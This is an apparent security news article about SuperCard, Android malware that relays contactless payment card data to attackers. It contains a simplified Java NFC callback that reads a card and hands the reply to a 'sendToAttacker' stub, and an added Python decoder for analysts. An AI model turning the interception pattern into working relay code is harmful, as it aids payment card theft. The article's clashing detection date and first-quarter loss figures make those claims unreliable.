New SuperCard Malware Using Hacked Android Phones to Relay Data from Users' Payment Cards to Attackers' Device

In a concerning development for mobile payment security, cybersecurity experts have identified a sophisticated new malware strain named “SuperCard” that exploits Android devices to steal payment card data.

This malicious application, a modified version of the legitimate NFCGate program, intercepts Near Field Communication (NFC) traffic during contactless payments, effectively turning compromised phones into relay devices that transmit sensitive financial information directly to attackers.

First detected in April 2025 by Italian security firm Cleafy, SuperCard initially targeted European banking customers before expanding its reach.

The malware operates as part of a well-organized “malware-as-a-service” (MaaS) platform called SuperCard X, which cybercriminals can subscribe to through underground Telegram channels.

Unlike previous NFC-exploiting threats, SuperCard offers subscribers sophisticated customer support services, reflecting the increasingly professional nature of today’s cybercrime ecosystem.

Habr researchers identified that the attack begins with social engineering tactics, where victims receive messages from seemingly legitimate sources urging them to install what appears to be a useful application.

Once installed, the malware requests permissions to access the device’s NFC module and payment systems, establishing itself as the default payment handler.

// Simplified representation of SuperCard's NFC interception mechanism
// (Android reader-mode callback, invoked when a contactless card is presented)
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import android.util.Log;

@Override
public void onTagDiscovered(Tag tag) {
    IsoDep isoDep = IsoDep.get(tag);  // ISO-DEP (ISO 14443-4) channel to the card
    try {
        isoDep.connect();
        // SELECT by AID (INS A4, P1 04), Lc 07, AID A0000000421010.
        // Java byte literals above 0x7F need an explicit (byte) cast to compile.
        byte[] command = {
            (byte) 0x00, (byte) 0xA4, (byte) 0x04, (byte) 0x00, (byte) 0x07,
            (byte) 0xA0, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x42, (byte) 0x10, (byte) 0x10
        };
        byte[] result = isoDep.transceive(command);  // card's FCI response plus status word
        // Intercept and forward card data to C2 server
        sendToAttacker(result);
    } catch (Exception e) {
        Log.e("SuperCard", "Error communicating with card", e);
    }
}

Infection Mechanism and Data Exfiltration

The sophistication of SuperCard lies in its multi-stage infection process. After installation, the malware remains dormant until it detects a payment transaction.

When a user attempts to make a contactless payment, SuperCard activates in the background, capturing the transaction data while allowing the legitimate payment to proceed.

This stealth approach ensures victims remain unaware of the compromise while their card details are transmitted to command-and-control servers.
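To see what an analyst actually finds in captured relay traffic, the following added example (not code from the article, SuperCard or NFCGate) decodes the SELECT-by-AID command from the snippet above and parses a card's BER-TLV response; the RID table is a partial list of well-known payment schemes and the reply bytes are constructed sample data.

```python
# Added example, not code from the article, SuperCard or NFCGate: decode the SELECT-by-AID
# command shown above and a constructed card reply. KNOWN_RIDS is partial; CARD_REPLY is made up.
KNOWN_RIDS = {  # registered application provider identifiers (first 5 AID bytes)
    "A000000003": "Visa",
    "A000000004": "Mastercard",
    "A000000042": "CB (Cartes Bancaires)",
}

def parse_command(raw: bytes) -> dict:
    """Parse a short-form ISO 7816-4 command APDU whose Lc byte is present."""
    if len(raw) < 5 or len(raw) < 5 + raw[4]:
        raise ValueError("truncated APDU")
    return {"cla": raw[0], "ins": raw[1], "p1": raw[2], "p2": raw[3],
            "data": raw[5:5 + raw[4]]}

def describe_select(apdu: dict) -> str:
    """Name the payment scheme a SELECT (INS A4) by DF name (P1 04) targets."""
    if apdu["ins"] != 0xA4 or apdu["p1"] != 0x04:
        return "not a SELECT by AID"
    rid = apdu["data"][:5].hex().upper()
    return KNOWN_RIDS.get(rid, f"unknown RID {rid}")

def parse_tlv(buf: bytes) -> dict:
    """Flatten BER-TLV into {tag_hex: value}, descending into constructed tags."""
    out, i = {}, 0
    while i < len(buf):
        first = tag = buf[i]; i += 1
        if first & 0x1F == 0x1F:              # two-byte tag (e.g. 9F xx in EMV)
            tag = (first << 8) | buf[i]; i += 1
        length = buf[i]; i += 1
        if length & 0x80:                     # long-form length
            n = length & 0x7F
            length = int.from_bytes(buf[i:i + n], "big"); i += n
        value = buf[i:i + length]; i += length
        if first & 0x20:                      # constructed tag: recurse into children
            out.update(parse_tlv(value))
        else:
            out[f"{tag:02X}"] = value
    return out

def parse_response(raw: bytes) -> tuple:
    """Split a response APDU into its FCI fields and the trailing status word."""
    return parse_tlv(raw[:-2]), raw[-2:].hex().upper()

# The article's SELECT command, and a constructed FCI reply (label "CB TEST", SW 9000).
SELECT_CMD = bytes.fromhex("00A4040007A0000000421010")
CARD_REPLY = bytes.fromhex("6F148407A0000000421010A5095007434220544553549000")

if __name__ == "__main__":
    print(describe_select(parse_command(SELECT_CMD)), parse_response(CARD_REPLY))
```

The same two functions, applied to APDUs captured from a phone's NFC stack, let a defender tell which payment application a suspicious app is selecting and what fields it is shuttling off the device.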

F6 security analysts report that SuperCard has already compromised over 175,000 Android devices in Russia alone, with damages exceeding 432 million rubles in the first quarter of 2025.

The malware’s rapid global spread demonstrates the evolving threat landscape for mobile payment systems, requiring users to exercise extreme caution when installing applications, even those that appear legitimate.
